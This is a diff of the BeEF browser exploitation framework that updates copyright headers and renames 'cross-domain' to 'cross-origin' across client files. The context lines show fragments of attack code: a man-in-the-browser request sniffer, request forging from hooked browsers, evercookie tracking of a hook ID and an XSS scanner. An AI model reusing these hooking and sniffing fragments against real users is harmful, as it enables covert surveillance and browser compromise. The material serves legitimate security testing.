@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/hardware.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/init.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/lib/evercookie.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -31,7 +31,7 @@
  *  for example, if someone deletes all but one type of cookie, once
  *  that cookie is re-discovered, all of the other cookie types get reset
  *
- *  !!! SOME OF THESE ARE CROSS-DOMAIN COOKIES, THIS MEANS
+ *  !!! SOME OF THESE ARE CROSS-ORIGIN COOKIES, THIS MEANS
  *  OTHER SITES WILL BE ABLE TO READ SOME OF THESE COOKIES !!!
  *
  * USAGE:
@@ -803,7 +803,7 @@ this.evercookie_cookie = function(name, value)
         else
             return this.getFromStr(name, document.cookie);
     }catch(e){
-        // the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
+        // the hooked origin is using HttpOnly, so we must set the hook ID in a different way.
         // evercookie_userdata and evercookie_window will be used in this case.
     }
 };

core/main/client/logger.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/mitb.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -38,7 +38,7 @@ beef.mitb = {
                         if (method == "GET") {
                             //GET request -> cross-origin
                             if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
-                                beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
+                                beef.mitb.sniff("GET [Ajax CrossOrigin Request]: " + url);
                                 window.open(url);
                             }else { //GET request -> same-origin
                                 beef.mitb.sniff("GET [Ajax Request]: " + url);

core/main/client/net.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -74,7 +74,7 @@ beef.net = {
         this.status_text = null;        // success, timeout, error, ...
         this.response_body = null;      // "<html>…." if not a cross-origin request
         this.port_status = null;        // tcp port is open, closed or not http
-        this.was_cross_domain = null;   // true or false
+        this.was_cross_origin = null;   // true or false
         this.was_timedout = null;       // the user specified timeout was reached
         this.duration = null;           // how long it took for the request to complete
         this.headers = null;            // full response headers
@@ -217,11 +217,11 @@ beef.net = {
      * @return {Object} this object contains the response details
      */
     request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
-        //check if same domain or cross domain
-        var cross_domain = true;
+        //check if same origin or cross origin
+        var cross_origin = true;
         if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
             if (document.location.port == "" || document.location.port == null) {
-                cross_domain = !(port == "80" || port == "443");
+                cross_origin = !(port == "80" || port == "443");
             }
         }
 
@@ -238,12 +238,12 @@ beef.net = {
 
         //define response object
         var response = new this.response;
-        response.was_cross_domain = cross_domain;
+        response.was_cross_origin = cross_origin;
         var start_time = new Date().getTime();
 
         /*
          * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
-         * This will turn POSTs into GETs for remote-domain requests.
+         * This will turn POSTs into GETs for cross origin requests.
          */
         if (method == "POST") {
             $j.ajaxSetup({
@@ -310,7 +310,7 @@ beef.net = {
     /**
      * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
      *  - requestid: needed on the callback
-     *  - allowCrossDomain: set cross-domain requests as allowed or blocked
+     *  - allowCrossOrigin: set cross-origin requests as allowed or blocked
      *
      * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
      * Example usage:
@@ -318,20 +318,20 @@ beef.net = {
      *   true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
      *   alert(response.response_body)})
      */
-    forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
+    forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossOrigin, requestid, callback) {
 
         if (domain == "undefined" || path == "undefined") {
             beef.debug("[beef.net.forge_request] Error: Malformed request. No host specified.");
             return;
         }
 
-        // check if same domain or cross domain
-        var cross_domain = true;
+        // check if same origin or cross origin
+        var cross_origin = true;
         if (document.domain == domain && document.location.protocol == scheme + ':') {
             if (document.location.port == "" || document.location.port == null) {
-                cross_domain = !(port == "80" || port == "443");
+                cross_origin = !(port == "80" || port == "443");
             } else {
-                if (document.location.port == port) cross_domain = false;
+                if (document.location.port == port) cross_origin = false;
             }
         }
 
@@ -348,23 +348,23 @@ beef.net = {
 
         // define response object
         var response = new this.response;
-        response.was_cross_domain = cross_domain;
+        response.was_cross_origin = cross_origin;
         var start_time = new Date().getTime();
 
-        // if cross-domain requests are not allowed and the request is cross-domain
+        // if cross-origin requests are not allowed and the request is cross-origin
         // don't proceed and return
-        if (allowCrossDomain == "false" && cross_domain) {
+        if (allowCrossOrigin == "false" && cross_origin) {
             beef.debug("[beef.net.forge_request] Error: Cross Domain Request. The request was not sent.");
             response.status_code = -1;
-            response.status_text = "crossdomain";
-            response.port_status = "crossdomain";
+            response.status_text = "crossorigin";
+            response.port_status = "crossorigin";
             response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
             response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
             if (callback != null) callback(response, requestid);
             return response;
         }
 
-        // if the request was cross-domain from a HTTPS origin to HTTP
+        // if the request was cross-origin from a HTTPS origin to HTTP
         // don't proceed and return
         if (document.location.protocol == 'https:' && scheme == 'http') {
             beef.debug("[beef.net.forge_request] Error: Mixed Active Content. The request was not sent.");
@@ -379,7 +379,7 @@ beef.net = {
 
         /*
          * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
-         * This will turn POSTs into GETs for remote-domain requests.
+         * This will turn POSTs into GETs for cross origin requests.
          */
         if (method == "POST") {
             $j.ajaxSetup({
@@ -432,10 +432,10 @@ beef.net = {
             },
 
             complete: function (xhr, textStatus) {
-                // cross-domain request
-                if (cross_domain) {
+                // cross-origin request
+                if (cross_origin) {
 
-                    response.port_status = "crossdomain";
+                    response.port_status = "crossorigin";
 
                     if (xhr.status != 0) {
                         response.status_code = xhr.status;
@@ -446,7 +446,7 @@ beef.net = {
                     if (textStatus) {
                         response.status_text = textStatus;
                     } else {
-                        response.status_text = "crossdomain";
+                        response.status_text = "crossorigin";
                     }
 
                     if (xhr.getAllResponseHeaders()) {
@@ -460,7 +460,7 @@ beef.net = {
                     }
 
                 } else {
-                    // same-domain request
+                    // same-origin request
                     response.status_code = xhr.status;
                     response.status_text = textStatus;
                     response.headers = xhr.getAllResponseHeaders();

core/main/client/net/connection.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/net/dns.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/net/local.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/net/portscanner.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/net/requester.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -25,7 +25,7 @@ beef.net.requester = {
             request = requests_array[i];
             if (request.proto == 'https') var scheme = 'https'; else var scheme = 'http';
             beef.debug('[Requester] ' + request.method + ' ' + scheme + '://' + request.host + ':' + request.port + request.uri + ' - Data: ' + request.data);
-            beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
+            beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossOrigin, request.id,
                                        function(res, requestid) { beef.net.send('/requester', requestid, {
                                            response_data: res.response_body,
                                            response_status_code: res.status_code,

core/main/client/net/xssrays.js

@@ -171,7 +171,7 @@ beef.net.xssrays = {
                 this.xss({href:url.href, pathname:url.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,
                     search:url.search, type: 'url'});//scan each link & param
             } else {
-                beef.debug('Scan is not Cross-domain.  URLS\nurl :' + url.hostname.toString());
+                beef.debug('Scan is not Cross-origin.  URLS\nurl :' + url.hostname.toString());
                 beef.debug('\nlocation :' + location.hostname.toString());
             }
         }
@@ -251,7 +251,7 @@ beef.net.xssrays = {
                             continue;
                         }
                         if (!this.crossDomain && (this.host(action).toString() != this.host(location.toString()))) {
-                            beef.debug('Scan is not Cross-domain. FormPost\naction :' + this.host(action).toString());
+                            beef.debug('Scan is not Cross-origin. FormPost\naction :' + this.host(action).toString());
                             beef.debug('location :' + this.host(location));
                             continue;
                         }

core/main/client/os.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //